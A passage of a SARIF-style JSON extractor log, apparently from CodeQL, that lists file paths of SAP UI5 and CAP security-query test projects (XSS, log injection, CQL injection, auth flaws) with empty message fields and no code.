ascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":544}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":162}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":557}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/index.js","uriBaseId":"%SRCROOT%","index":618}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-urlparams-jsonmodel/webapp/controller/Display.controller.js","uriBaseId":"%SRCROOT%","index":589}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":381}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":599}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":382}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":563}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":224}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":573}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":209}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":343}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":582}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":170}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service1.js","uriBaseId":"%SRCROOT%","index":128}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/Bindings/test.js","uriBaseId":"%SRCROOT%","index":244}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":306}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":527}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":278}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":229}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":340}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment-load/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":616}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":136}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":548}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js","uriBaseId":"%SRCROOT%","index":144}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/JsonParser/test.js","uriBaseId":"%SRCROOT%","index":249}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":112}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":271}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":546}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":357}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":220}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":549}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":217}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":545}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":305}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":164}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":580}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js","uriBaseId":"%SRCROOT%","index":108}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":559}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js","uriBaseId":"%SRCROOT%","index":197}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js","uriBaseId":"%SRCROOT%","index":169}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":172}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/server.js","uriBaseId":"%SRCROOT%","index":183}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":269}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":538}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js","uriBaseId":"%SRCROOT%","index":146}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":521}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":296}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":222}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/heuristic-models/tests/Sources/test.js","uriBaseId":"%SRCROOT%","index":3}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":565}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":208}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":572}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":536}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI